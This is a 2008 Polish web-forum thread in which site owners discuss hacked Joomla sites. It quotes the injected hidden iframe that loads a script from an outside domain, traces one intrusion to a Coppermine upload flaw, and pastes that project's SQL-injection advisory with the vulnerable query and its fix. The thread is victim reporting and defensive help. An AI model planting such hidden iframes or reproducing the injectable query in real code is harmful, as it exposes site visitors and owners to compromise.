PDA

Zobacz pełną wersję : Znowu włamanie



orion000
10-04-2008, 22:32
Witam!
zamiast pliku index.php umieszczono inny o zawartości:

<!--i frame name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe--><!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe--><iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></i frame>

To już kolejny raz, tylko striona inna i serwer inny.

Czy ktoś mi podpowie jak tego dokonują hackerzy i jak się przed tym zabezpieczyć?

inkos
10-04-2008, 22:39
Poczytaj wątki w tym dziale forum a z pewnościa dowiesz się więcej na ten temat czyli co może być powodem takich "wizyt" i jak temu zapobiec.

Oczywiscie Twoj problem moze byc troche bardziej zlozony wiec po lekturze regulaminu uzupelnij swojego posta o mozliwie jaknajwiecej informacji potrzebnych do zdiagnozowania problemu.

stasio
10-04-2008, 22:40
witam borykam sie z czymś podobnym
mam w każdym pliku php i html na końcu taka linijkę, u mnie włam był raczej przez zomm galery szukam łaty na 2.5.4 rc4

orion000
10-04-2008, 22:46
U mnie włamy zdarzyły się zarówno na Joomli 1.0.11 (wiem, że czas ją zaktualizować_ jak i na joomli 1.0.13 IE utf. Strony chodzą na róznych serwerach (choć jak dotąd wszystkie to apache). Mam zainstalowane różne komponenty i moduły, które raczej się nie powtarzają. Co za licho?

crazyluki
10-04-2008, 22:51
a u mnie pod blokiem zdarzyło się włamanie. jak się zabezpieczyć i kto mi się włamał? włamania - temat rzeka. Niestety, ciężko jest przypadki uogólniać. Każdy przypadek można, a nawet trzeba rozpatrywać indywidualnie. Jakie komponenty ?
i dlaczego narzekasz na 1.0.11 że są włamy skoro wiesz że trzeba zaktualizować?

stasio
10-04-2008, 22:53
heheh no właśnie , ja siedzie i śledzę logi serwera i daty zmiany plików...
ale im bardzije patrze w te logi tym mniej widze... i juz sam sie zastanawiam czego szukać w nich:(

inkos
11-04-2008, 01:08
i juz sam sie zastanawiam czego szukać w nich:(
Czegoś co poda informację iż np. plik index.php z katalogu głównego Twojej Joomla został zmodyfikowany o tej i tej godzinie (masz taką info nawet w zwyklym Total commanderze +/- czasami time zone servera). W logach szukasz kto czyli jakie IP dokonalo tej zmiany. Jak nie wiesz a masz porzadny serwer - napisz do admina -> pomoze okreslic co i jak.

Z taką wiedzą podejmujesz stosowne kroki aby zapobiec ponownym atakom. Co i jak było już omawiane w tej kategorii na forum.

nexus246
11-04-2008, 10:00
Te skrypty co podmieniają pliki to automaty, wyłącz register globals, dodaj odpowiednie wpisy do htaccess (poszukaj sobie tutaj albo na joomla.org) i będzie spokój.

stasio
11-04-2008, 13:18
dobra... teraz wam powiem śledztwo doprowadziło mnie co się stało
o 22:44:41 z Ukrainy zostało wysłane zapytanie do pliku upload.php wgrany plik zip z kodem i trach do 23:08 nie było nic a (o przepraszam napisałem to głośno? to z nerwów) okazało sie ze dziura była w coppermine :D wiec szczęśliwym zwycięzcą konkursu na wpuszczenie wirusa okazał sie skrypt galerii , jommla nie miała z tym za wiele wspołnego :|
jak ktoś ma coppera niech aktualizuje i poprawia go bo dzięki na...kicham na takie kłopoty :-) teraz sobie siedzę i z backupu przenoszę pliki :) wole to niż poprawianie wszystkich plików

orion000
11-04-2008, 13:24
Ja nie mam coppermine. Za to wszędzie mam jce więc może to przez niego. Dziś wgrałem do niego łatkę. Sprawdziłem i powyłączałem register globals tam gdzie było włączone. Uzupełniłem htaccess wszystkim co znalazłem na forum. I chyba pozostaje czekać i patrzeć :)

inkos
11-04-2008, 16:18
orion000: Może zamiast obwiniać JCE (moze to byc winowajca ale nie musi) zajmij się aktualizacją Joomla do najnowszej wersji. Poszukaj w logach tak jak to zrobił stasio. Z tak skonfigurowanym serwerem mozesz poczekać na ewentualne "odwiedziny" :) Choć oczywiście nikt nie da Ci gwarancji że jest on w 100% bezpieczny.

stasio
11-04-2008, 16:31
na moje aktualizacja do 13 wystarczy, choc na dniach trzeba bedzie 15 wziac, potem migracja do 1.5 hhehe

co do winowajcy jak czytaliscie ja obwinialem zoom bo miał 22:44 czas ataku... przejrzałem logi wyszukalem wszytskie POST i znalazłem plik upload w goolach dałem "post upload.php <iframe" no mi pokazalo ze wszystko co było to ataki na coppermine u innych a na joomli byli moze 3 przypadki tego wiec warto szukać dziury niz domniemać... bo dmoniemac mozna tylko czy dziecko jest twoje czy nie...

stasio
12-04-2008, 15:16
Dołączę jeszcze od siebie info coppermine - tak a propo włamów na serwery
--------------------------------------------------------------------------
The development team is releasing a security update for Coppermine in order to counter a recently discovered sql injection vulnerability. It is important that all users who run version cpg1.4.16 or older update to this latest version as soon as possible.

To correct the security issue manually, you can apply the fix mentioned below. Please note that applying the manual fix will keep you secure, but it is not a substitute for updating your gallery fully, as there are several other non-security related fixes that went into cpg1.4.17 as well.

Manual fix (not recommended):
To manually fix the vulnerability, edit upload.php, find

Code:
} else {
// We will try to get the extension from the database.
$MIME_result = cpg_db_query("SELECT extension FROM {$CONFIG['TABLE_FILETYPES']} WHERE mime='$URI_MIME_type'");

// Check to see if any results were returned.
if (!mysql_num_rows($MIME_result)) {

// No results, so free up the resources.
mysql_free_result($MIME_result);

// We cannot determine an extension from the MIME type provided, so note an error. Reject the file as unsafe.
$URI_failure_array[] = array( 'failure_ordinal'=>$failure_ordinal, 'URI_name'=> $_POST['URI_array'][$counter], 'error_code'=>$lang_upload_php['MIME_type_unknown']);

// There is no need for further tests or action, so skip the remainder of the iteration.
continue;

} else {

// The was a result. Fetch it.
$extension_data = mysql_fetch_array($MIME_result);

// Release the resources.
mysql_free_result($MIME_result);

// Store the extension in $extension.
$extension = $extension_data['extension'];
}

}


and replace with
Code:
} else {

$extension = '';

foreach ($FILE_TYPES as $ext => $typedata){

if ($typedata['mime'] == $URI_MIME_type){
// Store the extension in $extension.
$extension = $ext;
break;
}

}

if (!$extension){

// We cannot determine an extension from the MIME type provided, so note an error. Reject the file as unsafe.
$URI_failure_array[] = array( 'failure_ordinal'=>$failure_ordinal, 'URI_name'=> $_POST['URI_array'][$counter], 'error_code'=>$lang_upload_php['MIME_type_unknown']);

// There is no need for further tests or action, so skip the remainder of the iteration.
continue;

}

}

The following issues have been addressed in this release (changelog excerpt):
2008-04-10 Release of cpg1.4.17 {GauGau}
2008-04-10 Corrected an SQL injection vulnerability in URI upload code {Nibbler}
2008-03-19 Added Welsh language file (user contribution) {Nibbler}
2008-03-02 Updated version count from cpg1.4.16 to cpg1.4.17 in subversion repository as a preparation for a possible future release {GauGau}
2008-02-29 Changed date formats in lang files for better windows compatibility {Nibbler}
2008-02-12 Updated Romanian language file (user contribution) {GauGau}
2008-02-07 Added Latvian language file (user contribution) {GauGau}
2008-02-04 ImageMagick rotate bug fix {Nibbler}How to update:
To update any version of Coppermine to version 1.4.17, download (http://downloads.sourceforge.net/coppermine/cpg1.4.17.zip) the latest version from the download page (http://sourceforge.net/project/showfiles.php?group_id=89658) and follow the upgrade steps in the documentation (http://coppermine-gallery.net/demo/cpg14x/docs/index.htm#upgrade).

If you have problems with this update, please use the Update support board (http://forum.coppermine-gallery.net/index.php/board,59.0.html). Do not post your issues to this announcement thread - they will be deleted without notice.


Thanks,
The Coppermine Team
---------------------------------------------------------------------------------

myślę ze kto używa coppermine powinien sie zabrać za upgrade, tym bardzie ze tyczy sie to zasadniczo każdej wersji skryptu